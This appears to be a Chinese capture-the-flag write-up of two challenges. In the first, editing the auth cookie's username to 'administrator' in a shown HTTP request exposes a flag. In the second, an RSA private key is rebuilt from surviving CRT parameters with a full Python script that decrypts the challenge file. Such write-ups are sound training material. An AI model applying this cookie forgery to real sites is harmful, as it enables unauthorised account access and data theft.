数据泄露
直接替换cookie中的username为administrator即可获得信用卡号(Flag)
text
GET / HTTP/1.1
Host: 47.116.205.197:32768
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: auth=username%3Dadministrator%26date%3D2025-11-11T00%3A48%3A00%2B0000%26
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="136", "Google Chrome";v="136"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.48 Safari/537.36
Referer: http://47.100.205.69/
Accept-Encoding: gzip, deflate
数据泄露
题目描述
某公司一员工由于存储不当导致一个密钥文件损坏,无法解密相关重要文件。安全部门的小A通过技术手段恢复了部分密钥文件数据,请你帮助小A完整恢复密钥文件,并尝试解密获得答案字符串。
赛题文件:
text
链接: https://pan.baidu.com/s/1vJJMnRjaPYAF0IPRhkidVA?pwd=n264 提取码: n264broken_sk.pem- 损坏的RSA私钥secret.enc- 加密文件(256字节)
解题思路
1. 损坏情况分析
首先查看损坏的密钥文件,发现大量 AAAA... 字符,这是Base64编码的0x00字节。
解码并分析ASN.1结构后发现虽然主要参数被破坏,但CRT参数 dP 和 dQ 几乎完整:
text
参数 非零字节占比 状态
n (modulus) 0.8% ✗ 严重损坏
e (exponent) 100% ✓ 完整 (65537)
d (private) 0.4% ✗ 严重损坏
p (prime1) 13.2% ✗ 损坏
q (prime2) 1.6% ✗ 损坏
dP (CRT param) 99.2% ✓ 几乎完整
dQ (CRT param) 97.7% ✓ 几乎完整
qInv 部分 △ 部分可用2. 密钥恢复原理
RSA的中国剩余定理(CRT)参数满足:
text
dP = d mod (p-1)
dQ = d mod (q-1)变形得到:
text
e × dP = k₁ × (p-1) + 1
e × dQ = k₂ × (q-1) + 1因此:
text
p = (e × dP - 1) / k₁ + 1
q = (e × dQ - 1) / k₂ + 1遍历 k 值,找到使 p 和 q 为质数的解。
3. 恢复脚本
python
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64
# 提取参数(省略ASN.1解析代码)
e = 65537
dP = 0xad19bffb02249f7ea6e0d3b8c9d05c5f7dfc99d05c880d89afa6c52c59cd10b569ace9ee800973ed9dc38fac2ded9badffd28fabcd8087bb5bf87e6a57131cca6ec555ad114a8322f2e77dd59f32fa1d61130c48e46bd3b71725e28e442575fed6fc1c1f8dba267c8c66b192eb9e7f6929b857bd7a0decabb121390081f58b3d
dQ = 0xd69a627595dd55e22c0dd9e81e3a9e9b089107aa39a607601593e922c799032ef04cea8b210052f0b5a094f70fbbbcfeb0516d63cd7627cb4103f0c3d034a12e7118424981ded35038ec30ad693e60c1b0e7e8a6519bef6a185f5be92af80444c8d0b84270e334c59013c3e9df9a29ec9af45db05f0c443b1e096239d3
def recover_prime(e, dX, max_k=100000):
ktmp = e * dX - 1
for k in range(1, max_k):
if ktmp % k == 0:
prime = ktmp // k + 1
if 1000 <= prime.bit_length() <= 1050:
if isPrime(prime):
return prime
return None
# 恢复质数
p = recover_prime(e, dP)
q = recover_prime(e, dQ, max_k=100000)
# 重建密钥
n = p * q
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
key = RSA.construct((n, e, d, p, q))
# 解密
with open('secret.enc', 'rb') as f:
enc_data = f.read()
cipher = PKCS1_OAEP.new(key)
plaintext = cipher.decrypt(enc_data)
print(plaintext.decode())4. 关键参数
python
p: k=1 时找到 (1024 bits)
q: k=57438 时找到 (1024 bits)
加密方式: PKCS#1 OAEP (非常见的v1.5)5. Flag
text
L 98-59 b|L 98-59 c|L 98-59 d|L 98-59 e|L 98-59 f